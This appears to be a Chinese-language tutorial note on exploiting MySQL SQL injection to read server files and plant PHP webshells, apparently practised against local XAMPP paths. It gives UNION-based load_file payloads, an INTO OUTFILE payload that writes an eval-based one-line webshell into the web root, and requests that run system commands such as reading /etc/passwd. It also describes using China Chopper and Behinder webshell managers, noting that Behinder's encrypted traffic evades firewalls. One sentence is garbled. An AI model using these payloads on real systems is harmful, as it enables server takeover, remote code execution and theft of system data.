文件读写与木马植入

文件读写与木马植入

一、读写权限确认

show global variables like '%secure%';
# 查看mysql全局变量的配置,当输入以上命令后,结果
secure_file_priv = 空 的时候,任意读写
secure_file_priv = 某个路径的时候,只能在规定的路径下读写
secure_file_priv = NULL 不能读写

二、读取文件

  • 利用SQL语句读取系统文件,先读取常规文件(明确路径),如果能成功读取,则继续读取其他文件;如果明确知道路径,则尝试爆破路径下的文件;如果不知道路径,则爆破路径。
-1' union select 1,2,3,load_file("c:/windows/service.inf"),5,6

-1' union select 1,2,3,load_file("D:/XamppNew/htdics/security/commin.php"),5,6

三、写入木马

例如:select "helloworld" into outfile "/opt/lampp/htdocs/security/muma.php"

-1 union select 1,2,3,4,5,"<?php eval($_GET['a']);?>" intooutfile "D:/XamppNew/htdocs/security/temp/muma.php"

如果列数未知,也可以不停尝试,注入一次,访问一次,确认是否注入成功

一句话木马:
<?php eval($_POST['a']);?>
eval可以将一段字符串当成代码来执行,如果用户可以直接 将这段有效的PHP代码传入后台,则可以执行任意代码或指令

/security/temp/muma/php?a=phpinfo();
/security/temp/muma/php?a=echo date('Y-m-d');
/security/temp/muma/php?a=system('ip addr');
/security/temp/muma/php?a=system('cat /etc/passwd');

以上为GET请求的方式,也可以用POST请求的方式,这样可以添加的载荷更大,可以上传大马,但建议通过curl下载的方式植入大马
-1 union select 1,2,3,4,5,"<?php eval($_POST['a']);?>" intooutfile "D:/XamppNew/htdocs/security/temp/muma.php"

也可以上传一句话木马后,通过中国菜刀连接以便于操作

四、中国菜刀

  • 必须提前已经我去南城了木马植入然后才能使用。
  • 木马必须是POST请求,参数自定义,在菜刀中给出正确的参数名。
  • 菜刀采用Base64编码,相当于明文传输,目前已经被WAF进行防护了

五、冰蝎

  • 冰蝎是加密传输,防火墙很难分析出流量特征,比较容易绕开防火墙
  • 先上传一个冰蝎自己的带加密解密功能的shell脚本
  • 上传shell的过程有以下方式
    • 直接在命令行运行命令按行用echo写入
    • 用curl通过公网进行远程文件下载
    • 用菜刀连接,然后基于菜刀直接上传shell
    • 如果目标站点存在文件上传漏洞,直接在文件上传的时候上传shell
上一篇
下一篇